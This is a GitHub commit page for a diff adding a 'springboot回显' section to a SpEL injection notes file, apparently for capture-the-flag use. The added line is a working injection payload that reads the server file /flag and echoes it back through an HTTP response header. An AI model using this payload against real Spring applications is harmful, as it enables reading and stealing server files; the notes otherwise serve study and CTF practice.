Skip to content

Commit eb4ece3

Browse files
FirebaskyFirebasky
authored
Update Readme.md
1 parent df7e01e commit eb4ece3

1 file changed

Lines changed: 5 additions & 0 deletions

File tree

shell/SPEL/Readme.md

Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -110,6 +110,11 @@ print(')}')
110110

111111
其他bypass: https://xz.aliyun.com/t/9245
112112

113+
## springboot回显
114+
```
115+
Java.type("org.springframework.web.context.request.RequestContextHolder").currentRequestAttributes().getResponse().addHeader("test",new java.lang.String(Java.type("sun.misc.IOUtils").readFully(new java.io.FileInputStream("/flag"),1024,false)));
116+
```
117+
113118
## 参考
114119
> https://xz.aliyun.com/t/9245 **可以使用#request.getRequestedSessionId() 或者 #request.getHeader('User-Agent') 反正可以使用request对象或者respose**
115120
>

0 commit comments

Comments
 (0)